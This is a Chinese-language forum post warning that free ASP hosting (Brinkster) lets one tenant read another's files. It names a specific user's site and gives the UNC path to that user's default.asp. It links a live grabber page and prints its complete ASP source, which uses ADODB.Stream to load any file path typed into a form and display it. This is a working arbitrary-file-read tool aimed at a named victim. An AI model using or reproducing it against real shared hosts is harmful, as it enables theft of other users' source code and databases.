會員 | 【閒聊】免費ASP空間的迷思 你還在使用免費ASP空間嗎? 其實免費空間的安全性是非常非常的低的,舉個例子,以大家最常用的www.brinkster.com來說吧, 你知道嗎,要從免費空間獲取他人的程式碼,甚至資料庫都是輕而易舉的,簡單到只要有一點點的ASP基礎就能辦到 空口無憑,以這個網站為例: http://www10.brinkster.com/tskoda/Default.asp 也許他辛辛苦苦的寫了很久的ASP,但是其他的使用這只需要用不到20行的程式碼就能輕易的將原始碼抓回修改,甚至公開販賣 原始碼抓取程式: http://www10.brinkster.com/ggyyggy/stream.asp 在Input PhysicalPath中輸入 \\genfs1\www10\tskoda\default.asp 只需一個Stream元件就能將您的心血化為公有財產,您還敢使用免費空間嗎? 建議大家改用動態IP來架站吧,別再讓你的心血變成公共財了~ 申請動態IP架站 http://www.dslcity.net 附錄 Stream.asp的Source Code ) <% if request("B1") = "送出" then Dim Stream: Set Stream = server.CreateObject("ADODB.Stream") Stream.Charset = "ascii" Stream.Open Stream.LoadFromFile request("T1") GetFile = Stream.Readtext response.write Server.HTMLEncode(GetFile) Stream.Close else %> <html> <head></head> <title>原始碼抓取 By Maxtk</title> <body> <form method="POST"> <p>系統路徑為 : <%=request.servervariables("appl_physical_path")%></p> <p><input type="text" name="T1" size="20"> Input PhysicalPath <input type="submit" value="送出" name="B1"><input type="reset" value="取消" name="B2"></p> </form> </body></html> <% end if %> |
回覆 |
|
XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。